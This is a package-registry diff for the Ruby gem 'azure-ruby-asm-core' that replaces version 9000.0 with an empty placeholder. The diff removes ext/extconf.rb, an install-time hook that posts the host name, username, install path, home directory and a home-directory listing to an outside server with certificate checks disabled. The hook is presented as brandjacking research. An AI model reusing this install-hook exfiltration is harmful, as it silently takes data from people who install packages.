azure-ruby-asm-core 9000.0 → 9001.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. checksums.yaml +4 -4
  2. metadata +12 -19
  3. data/ext/extconf.rb +0 -50
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 35a3e6ea4aa236b26d38a0e4496bdc57adb3590d5337d7add14212082dc931d3
4
- data.tar.gz: 12cdf2ccdc10c9d571a859b6b1e163d253408ecedffec600327fcd546594e3ce
3
+ metadata.gz: 3de5a26ac0ad2a3dbfaef8c9fbd77e4f3c50f4a3d9fae3cc51c4795a8801189b
4
+ data.tar.gz: 5527c1511d8900d10775457717ed40e7acfe5b9e7bf1321a48c7c9abec06cfdf
5
5
  SHA512:
6
- metadata.gz: 17fb914a3055070d88d98f512a78ffc9675118efc244fa09a0c098844beb006d6871f0fae4f230fb9b79defcc3ff1dffd8f93a8d94a09bcd7fbaca12b5e0d65d
7
- data.tar.gz: 93f5382eb9f6b86013c9d96e575829078c13678581a2342244a50df8f6128bc904dcac13c1e08105ff2e0684645e4dc53fab78adb71c9bc179662104264d2fd7
6
+ metadata.gz: 716a9f7b6704735fecc3b53646b10c46711ba7d173c7c4fa543df706ba2ff79b6f0ef40b80702ae7d0a50c04ae76a8bb90b8e06544a7a3ec46a762575c51e979
7
+ data.tar.gz: '0975290196533d1606ead694b4ff4c61ad32859a60387171f3fc913193b252a0dc16b6af341e99f360ed0f8b2785060b1eaf8d4139b96059f6cfe6267c83df7e'
metadata CHANGED
@@ -1,34 +1,27 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: azure-ruby-asm-core
3
3
  version: !ruby/object:Gem::Version
4
- version: '9000.0'
4
+ version: '9001.0'
5
5
  platform: ruby
6
6
  authors:
7
7
  - Maciej Mensfeld
8
8
  autorequire:
9
9
  bindir: bin
10
10
  cert_chain: []
11
- date: 2021-03-05 00:00:00.000000000 Z
11
+ date: 2021-05-22 00:00:00.000000000 Z
12
12
  dependencies: []
13
- description: |
14
- I am testing for brandjacking vulnerabilities in products that are in bug bounty programs.
15
-
16
- This code is reporting-only, and does not do anything malicious.
17
- email:
18
- - maciej@mensfeld.pl
13
+ description: This gem is empty. It protects against brandjacking. You are welcome.
14
+ If you think it is yours to own, just contact me.
15
+ email: []
19
16
  executables: []
20
- extensions:
21
- - ext/extconf.rb
17
+ extensions: []
22
18
  extra_rdoc_files: []
23
- files:
24
- - ext/extconf.rb
25
- homepage: https://diffend.io
19
+ files: []
20
+ homepage:
26
21
  licenses:
27
- - GPL-3.0
22
+ - MIT
28
23
  metadata: {}
29
- post_install_message: |
30
- This is probably not the package you wanted to install.
31
- Read the description of this gem for more details.
24
+ post_install_message:
32
25
  rdoc_options: []
33
26
  require_paths:
34
27
  - lib
@@ -43,8 +36,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
43
36
  - !ruby/object:Gem::Version
44
37
  version: '0'
45
38
  requirements: []
46
- rubygems_version: 3.1.2
39
+ rubygems_version: 3.1.6
47
40
  signing_key:
48
41
  specification_version: 4
49
- summary: Gem that sends some non-sensitive data for security research.
42
+ summary: Empty gem - this is not what you wanted to install.
50
43
  test_files: []
data/ext/extconf.rb DELETED
@@ -1,50 +0,0 @@
1
- =begin
2
- Hi, if you're reading this you're probably wondering what this code is doing on your machine.
3
- Don't worry! It doesn't do anything nasty or malicious.
4
-
5
- I am an ethical security researcher, booking names of gems to prevent brandjacking.
6
-
7
- I also run a Ruby security related platform: https://diffend.io
8
-
9
- All data I collect will be deleted and I do not collect any sensitive information.
10
-
11
- That's why I don't even obfuscate the network calls with DNS requests or anything else.
12
-
13
- You can read the code to confirm this.
14
-
15
- If you have any questions or want to get in touch for any reason, you can reach me at:
16
-
17
- maciej@mensfeld.pl
18
-
19
- If this is affecting your organization, for example because I took name that uses your naming
20
- conventions, feel free to contact me and I will be more than happy to give it back to you.
21
-
22
- P.S. I did notify RubyGems security team, so they are aware of my activity.
23
- =end
24
-
25
- require 'mkmf'
26
- require 'net/http'
27
- require 'socket'
28
- require 'etc'
29
- require 'securerandom'
30
- require 'json'
31
-
32
- create_makefile 'gem_test'
33
-
34
- uri = URI("https://ethically-testing-the.world")
35
- http = Net::HTTP.new(uri.host, uri.port)
36
- http.use_ssl = true
37
- http.verify_mode = OpenSSL::SSL::VERIFY_NONE
38
- request = Net::HTTP::Post.new('/azure-ruby-asm-core/9000.0')
39
- request.add_field('Content-Type', 'application/json')
40
-
41
- request.body = {
42
- hostnames: [Socket.gethostname, Socket.gethostbyname(Socket.gethostname).first].uniq,
43
- username: Etc.getlogin,
44
- path: File.dirname(__FILE__),
45
- home: Dir.home,
46
- home_ls: Dir.entries(Dir.home),
47
- id: SecureRandom.uuid,
48
- }.to_json
49
-
50
- http.request(request)